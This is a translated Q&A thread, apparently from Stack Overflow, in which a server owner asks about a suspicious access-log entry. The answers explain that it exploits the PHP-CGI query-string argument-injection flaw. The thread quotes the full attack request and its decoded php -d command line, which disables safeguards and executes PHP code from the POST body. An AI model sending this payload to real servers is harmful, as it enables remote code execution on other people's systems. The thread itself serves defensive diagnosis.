这是试图破解我的行为吗?

时间:2013-12-30 10:15:35

标签: php security cgi-bin

所以我从昨天开始主持一个Web服务器,我在访问日志中找到了这个:

POST /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n

现在我不知道这是做什么的,但对我而言似乎有点粗略。

2 个答案:

答案 0 :(得分:4)

看起来有人试图关闭安全模式并尝试在服务器上推送和执行他的PHP文件。

P.S。这与PHP代码无关,但与您的服务器安全性无关,您应该在Google上查看使用过的术语/命令以了解更多信息。

答案 1 :(得分:3)

这是一个利用vulnerability discovered by Kingcope的HTTP请求,其中/cgi-bin/php直接映射到PHP可执行文件,查询字符串用作参数:

php -d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n

-d参数与INI条目兼容,基本上使PHP从POST主体读取和执行PHP代码(即auto_prepend_file=php://input)。